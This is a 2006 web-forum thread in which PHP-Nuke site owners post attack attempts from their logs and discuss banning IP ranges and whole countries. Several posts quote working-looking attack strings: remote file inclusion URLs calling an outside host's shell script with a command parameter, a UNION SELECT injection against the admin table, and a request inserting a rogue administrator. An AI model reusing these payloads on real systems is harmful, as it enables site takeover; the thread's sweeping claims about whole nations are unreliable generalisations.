| Author |
Message |
MarkyBear
Hangin' Around
Joined: Mar 27, 2005
Posts: 39
|
 Posted:
Wed Feb 15, 2006 9:53 pm |
 
|
Someone in Turkey is attempting to hack my site, luckily I am patched up, have extra site protection and whomever the hacker is, is using hacks for post nuke and xoops cms which I don't run!
Latest from my error logs:
| Code: | [Tue Feb 14 05:01:14 2006] [error] [client 81.214.167.116] File does not exist: /home/xxxxxxxxxx/public_html/modules/PNphpBB2/includes/functions_admin.php
[Tue Feb 14 13:39:19 2006] [error] [client 81.215.237.159] File does not exist: /home/xxxxxxxxxx/public_html/modules/4nAlbum/public/displayCategory.php
[Wed Feb 15 18:16:52 2006] [error] [client 85.98.60.174] File does not exist: /home/xxxxxxxxxx/public_html/modules/My_eGallery/public/displayCategory.php |
Here is the links they were using:
| Code: | /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aviozone.com/tool25.dat?&list=1&cmd=id
/modules/My_eGallery/public/displayCategory.php?basepath=http://aviozone.com/tool25.dat?&list=1&cmd=id |
I went to the but all 'contact us' links brings me to fake email addy's.
But if you copy-paste this link into your browser, you can DL and open in notepad, the tool they're trying to use and it definately is a defacing tool:
| Code: | | http://aviozone.com/tool25.dat?&list=1&cmd=id |
I've banned a few different IP addys so far and three different ranges but they keep coming back, here's what I have banned so far:
81.214.167.116
81.214.160.0 81.214.175.255
81.215.232.0 - 81.215.239.255
81.214.169.117
85.98.60.174
85.98.48.0 - 85.98.63.255
What should I do, I'm tempted to block the entire country next! |
|
|
|
|
Dawg
RavenNuke(tm) Development Team
Joined: Nov 07, 2003
Posts: 889
|
| Posted:
Wed Feb 15, 2006 10:02 pm |
|
Ban the entire country!! Ban'em All!
I don't know what part of the world you are in or what your site is abou but I have most of the world banned from my site.
If nothing else...Ban it for the next week....they will move on to someone else!
Dawg |
|
|
|
|
|
MarkyBear
Hangin' Around
Joined: Mar 27, 2005
Posts: 39
|
| Posted:
Wed Feb 15, 2006 10:07 pm |
|
| Dawg wrote: | Ban the entire country!! Ban'em All!
I don't know what part of the world you are in or what your site is abou but I have most of the world banned from my site.
If nothing else...Ban it for the next week....they will move on to someone else!
Dawg |
LMAO, I LIKE IT!!!
They started this back in December, there would be an attempt every other week or so, but now it's every day...
I'm in the USA and have your everyday chat site for sports fans, so I'd have no problem banning the entire country, can that be done in Sentinel??? If not, where do I get the ranges? |
|
|
|
|
|
Dawg
RavenNuke(tm) Development Team
Joined: Nov 07, 2003
Posts: 889
|
| Posted:
Wed Feb 15, 2006 10:59 pm |
|
Did you install the Ip to Country tables when you installed NS?
If not what version are you running?
Dawg |
|
|
|
|
|
MarkyBear
Hangin' Around
Joined: Mar 27, 2005
Posts: 39
|
| Posted:
Wed Feb 15, 2006 11:25 pm |
|
| Dawg wrote: | Did you install the Ip to Country tables when you installed NS?
If not what version are you running?
Dawg |
Actually I just updated the IP2Countries in NS and saw that the number of pages for Turkey has dropped from 11 to 6...
I guess I just go on down the line and click 'block' for each range on all pages then??? |
|
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Wed Feb 15, 2006 11:34 pm |
|
The problem with Turkey is that they are all on dynamic DSL lines now. You ban one IP, they just get another. And banning ranges only works sometimes... each ISP seems to report small ranges that aren't contiguous.
I keep getting referral spam from "bwdow.com" - it autobans the IP but they keep coming
I think I may just go and ban Turkey anyway |
|
|
|
|
MarkyBear
Hangin' Around
Joined: Mar 27, 2005
Posts: 39
|
| Posted:
Wed Feb 15, 2006 11:53 pm |
|
That's what I'm going to do, Iran too, they've gave me some problems before from some school and when I emailed the admin, he demanded to see all my log files in there entirity before he did anything, needless to say i didn't! |
|
|
|
|
|
Susann
Moderator
Joined: Dec 19, 2004
Posts: 3143
Location: Germany:Moderator German NukeSentinel Support
|
| Posted:
Thu Feb 16, 2006 5:49 am |
|
Itīs that same tool Iīspoke from:
Itīs present since middle of december and there are different versions available. |
|
|
|
|
|
MarkyBear
Hangin' Around
Joined: Mar 27, 2005
Posts: 39
|
| Posted:
Thu Feb 16, 2006 6:12 am |
|
Yep, it was the ,iddle-end of December that I first noticed this in my error logs...
The site that the tool is hosted on, is poweb I believe, I'll check for sure and then contact them too...
Took awhile, but Turkey has been banned from site now, I'll keep my eyes open for any more of these...
Thanks everyone for their help and hopefully this doesn't get worse for all! |
|
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Thu Feb 16, 2006 6:39 am |
|
well i have about 20 banned countries.
why?....because they enjoy hacking sites or atleast try to.
And if you have a site that makes money somehow those countries will never bring in a penny,so you wont miss a thing.... |
|
|
|
|
|
MarkyBear
Hangin' Around
Joined: Mar 27, 2005
Posts: 39
|
| Posted:
Thu Feb 16, 2006 8:37 am |
|
Ya know if there was an easier way to just ban a whole country I'd prlly be up there too!
But this will make you all laugh, Union attack was just blocked by NS, here is the link they tried:
| Code: | | xtremezone.us/modules.php?name=Search&type=comments&query=not123exists&instory=/**UNION**/ SELECT/**0,0,pwd,0,aid**FROM**/nuke_authors |
The funny part is, look at what link refered them to my site, it was a google search of: 'this site is protected by nukesentinel'
| Code: | | http://www.google.com/search?q=this+site+is+protected+by++nukesentinel&hl=en&lr=&start=10&sa=N |
I hope they enjoyed those PC-Killer templates too!  |
|
|
|
|
|
viper155
Regular
Joined: Feb 18, 2006
Posts: 99
|
| Posted:
Sat Feb 18, 2006 12:46 pm |
|
Hey, Ive gotten hacked 2 times in the last 2 days... I looked through my access logs and found this link....
| Code: | | http://*******.com//modules/coppermine/themes/default/theme.php?THEME_DIR=http%3A%2F%2Faviozone.com%2Fshell.dat%3F&act=sql&sql_login=*dbnamewashere*&sql_passwd=*password*&sql_server=localhost&sql_port=3306&sql_db=*DBname*&sql_tbl_act=insert&sql_tbl=nuke_authors&sql_tbl_ls=0&sql_tbl_le=30&sql_tbl_insert_q=+%60aid%60+%3D+%27Viper%27+AND+%60name%60+%3D+%27God%27+AND+%60url%60+%3D+%27http%3A%2F%2Ft*mydomainname*%27+AND+%60email% |
the things with * around it was my real info they got*
and here is the DIR site url its using
| Code: | | http://aviozone.com/shell.dat?&act=about |
I removed coppermine and also found a file in the coppermine album folder that was called training.bmp but it was actually somehow a folder and not a image.. I opened it and it seemed like some scripts he prob uploaded through coppermine.
This ip was also from turkey and here it is for you to add to the ban list.
81.214.172.158 |
|
|
|
|
|
viper155
Regular
Joined: Feb 18, 2006
Posts: 99
|
| Posted:
Sat Feb 18, 2006 2:37 pm |
|
oh just found this.. here are the turkish hackers.. they keep score
|
|
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Sat Feb 18, 2006 2:52 pm |
|
nice find but also old news ,and i know about aviozone.
they are just victim in this...and i maild the host this morning...
if you wanna complain to send email to sa-abuse(at)powweb.com
Just ban turkey.
And rename your coppermine... |
|
|
|
|
|
viper155
Regular
Joined: Feb 18, 2006
Posts: 99
|
| Posted:
Sat Feb 18, 2006 3:06 pm |
|
do you think by me removing coppermine I might have a chance to not get hacked tonight... He does it around 7pm est evernight for the last 2 days |
|
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Sat Feb 18, 2006 3:25 pm |
|
well make sure you are secured,if so dont allow any privileges to upload,then in your coppermine config change your coppermine name to bloodyhell ,or marrs,or belinda carlisle...whatever...
these attacks are mostly by remote...
ever seen a coppermine named president ? |
|
|
|
|
|
MarkyBear
Hangin' Around
Joined: Mar 27, 2005
Posts: 39
|
| Posted:
Sat Feb 18, 2006 4:28 pm |
|
viper155, sorry about that happening, and that's around the same time it was tried by my site too...
I just banned all of Turkey...
My hosting Tech support suggested I use mod-rewrite for that tool name to redirect it, I'l like to do this, to the PC-Killers, but how would I go about that!? |
|
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Sat Feb 18, 2006 5:28 pm |
|
How about what ?
The templates..? |
|
|
|
|
|
MarkyBear
Hangin' Around
Joined: Mar 27, 2005
Posts: 39
|
| Posted:
Sat Feb 18, 2006 6:12 pm |
|
| hitwalker wrote: | How about what ?
The templates..? |
A way to redirect any link with:
| Code: | | tool25.dat?&list=1&cmd=id |
in it or maybe even just the 'tool.dat' part or whatever, but anytime there is a link with that in it, have that link redirected to one of the PC-Killer templates for NS. |
|
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Sat Feb 18, 2006 6:19 pm |
|
that wont work that way and its not easy.
with sentinel you dont need that realy.
The code they use is basically hosted on another site.
They also dont work,cause ive seem them all by now.
but as a temporary solution you could add to your htaccess
Redirect /whateverabusesive
the is the address you gonna send to.
keep the space between whateverabusesive and |
|
|
|
|
|
viper155
Regular
Joined: Feb 18, 2006
Posts: 99
|
| Posted:
Sun Feb 19, 2006 7:40 am |
|
Anyone know why when I go to the download section and click NukeSentinel my browser gets a error and has to close..
I wanna install that for my site 
Im using IE |
|
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Sun Feb 19, 2006 8:16 am |
|
i think raven is testing the downloads......lol
go to and download it there .. |
|
|
|
|
|
viper155
Regular
Joined: Feb 18, 2006
Posts: 99
|
| Posted:
Sun Feb 19, 2006 8:18 am |
|
Ok, My php-nuke has alot of edited files for modules such as nuke royal ect... Does anyone install this module for money?
thanks |
|
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Sun Feb 19, 2006 8:20 am |
|
on what patched nuke version are you? |
|
|
|
|
|
viper155
Regular
Joined: Feb 18, 2006
Posts: 99
|
| Posted:
Sun Feb 19, 2006 8:29 am |
|
I cant say for sure that im even on a patched version... Im running phpnuke 7.6
I was away from the internet for a few months and now that ive come back I have kinda forget everything ive done to the files... My guess is that I will need the patches and NukeSentinel added...
I am willing to pay for this to secure my site |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
